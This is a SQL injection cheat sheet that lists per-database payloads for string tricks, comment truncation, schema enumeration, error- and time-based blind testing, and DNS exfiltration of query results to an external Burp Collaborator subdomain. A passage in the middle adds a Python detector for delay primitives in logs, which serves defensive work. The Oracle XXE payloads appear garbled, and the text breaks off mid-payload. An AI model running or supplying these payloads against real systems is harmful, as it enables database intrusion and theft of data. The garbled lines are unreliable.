[2019] Hacker's SQL injection attack commands, the equivalent of a memo. You can use this syntax to execute SQL injection attacks, which often occurs when the
String concatenation
You can concatenate multiple strings to make a single string.
Oracle      'foo'||'bar'
Microsoft   'foo'+'bar'
PostgreSQL  'foo'||'bar'
MySQL       'foo' 'bar' [Note the space between the two strings]
            CONCAT('foo','bar')
Comments
You can use comments to truncate a query and remove the part of the original query that follows your input.
Oracle      --comment
Microsoft   --comment
            /*comment*/
PostgreSQL  --comment
            /*comment*/
MySQL       #comment
            -- comment [Note the space after the double dash]
            /*comment*/
Database type and version
You can query the database to determine its type and version. This information is useful in more complex attacks.
Oracle      SELECT banner FROM v$version
            SELECT version FROM v$instance
Microsoft   SELECT @@version
PostgreSQL  SELECT version()
MySQL       SELECT @@version
Database contents
You can list the tables that exist in the database, and the columns that those tables contain.
Oracle      SELECT * FROM all_tables
            SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
Microsoft   SELECT * FROM information_schema.tables
            SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQL  SELECT * FROM information_schema.tables
            SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQL       SELECT * FROM information_schema.tables
            SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
Conditional errors
You can test a single Boolean condition and trigger a database error if the condition is true.
Oracle      SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
Microsoft   SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL  SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL       SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
Batched (or stacked) queries
You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, their results are not returned to the application. The technique is therefore mainly of use against blind vulnerabilities, where you can use a second query to trigger a DNS lookup, a conditional error, or a time delay.
Oracle      Does not support batched queries.
Microsoft   QUERY-1-HERE; QUERY-2-HERE
PostgreSQL  QUERY-1-HERE; QUERY-2-HERE
MySQL       Does not support batched queries.
Time delays
You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds.
Oracle      dbms_pipe.receive_message(('a'),10)
Microsoft   WAITFOR DELAY '0:0:10'
PostgreSQL  SELECT pg_sleep(10)
MySQL       SELECT sleep(10)
Conditional time delays
You can test a single Boolean condition and trigger a time delay if the condition is true.
Oracle      SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
Microsoft   IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQL  SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQL       SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')
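A detection-side view of the two time-delay tables above, as an added example that is not part of the original cheat sheet: it flags the four delay primitives in logged query text and labels each hit conditional or unconditional. The rule names, the normalization step and the sample log lines are constructed for illustration, and the input is assumed to be raw SQL text taken from database or application logs.

```python
import re

# Time-delay primitives from the tables above, one pattern per database.
DELAY_RULES = {
    "oracle": re.compile(r"dbms_pipe\.receive_message\s*\("),
    "mssql": re.compile(r"waitfor\s+delay\s+'"),
    "postgresql": re.compile(r"pg_sleep\s*\("),
    # The lookbehind stops "pg_sleep(" or "my_sleep(" from matching here.
    "mysql": re.compile(r"(?<![a-z0-9_])sleep\s*\("),
}
CONDITIONAL = re.compile(r"\bcase\s+when\b|(?<![a-z0-9_])if\s*\(")
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(sql):
    # Replace /* */ comments with a space, lowercase, and collapse
    # whitespace, so padding between tokens does not hide a call.
    # String literals are not parsed, so a literal containing one of
    # these tokens is still flagged for review.
    sql = BLOCK_COMMENT.sub(" ", sql)
    return re.sub(r"\s+", " ", sql.lower()).strip()

def classify(sql):
    """Return (database, kind) for a delay primitive, or None."""
    text = normalize(sql)
    for db, rule in DELAY_RULES.items():
        if rule.search(text):
            kind = "conditional" if CONDITIONAL.search(text) else "unconditional"
            return db, kind
    return None

def scan(lines):
    """Return (line_number, database, kind) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = classify(line)
        if result:
            hits.append((number, *result))
    return hits

# Constructed sample log lines: two benign queries, five delay primitives.
SAMPLE_LOG = [
    "SELECT name FROM users WHERE id = 42",
    "SELECT sleep_hours FROM diary WHERE day = '2019-01-01'",
    "SELECT pg_sleep/**/(10)",
    "SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END",
    "x'; WAITFOR   DELAY '0:0:10'--",
    "SELECT IF(1=1,sleep(10),'a')",
    "SELECT 'a'||DBMS_PIPE.RECEIVE_MESSAGE(('a'),10) FROM dual",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Legitimate maintenance scripts also call these functions, so a hit is a prompt to review the source of the query rather than proof of injection.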
DNS lookup
You can cause the database to perform a DNS lookup to an external domain. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to confirm that a DNS lookup occurred.
Oracle      The following technique uses an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched, but there are many unpatched Oracle installations:
            SELECT extractvalue(xmltype('<?xml version="1.0" encoding="utf-8"?>'),'/l') FROM dual
            The following technique works on fully patched Oracle installations, but requires elevated privileges:
            SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')
Microsoft   exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'
PostgreSQL  copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'
MySQL       The following techniques work on Windows only:
            LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
            SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'
DNS lookup with data exfiltration
You can cause the database to perform a DNS lookup to an external domain that contains the results of an injected query. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to retrieve details of any DNS interactions, including the exfiltrated data.
Oracle      SELECT extractvalue(xmltype('<?xml version="1.0" encoding="utf-8"?>'),'/l') FROM dual
Microsoft   declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"')
PostgreSQL  create OR replace function f() returns void as $$
            declare c text;
            declare p text;
            begin
            SELECT into p (SELECT YOUR-QUERY-HERE);
            c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net''';
            execute c;
            END;
            $$ language plpgsql security definer;
            SELECT f();
MySQL       The following technique works on Windows only:
            SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcoll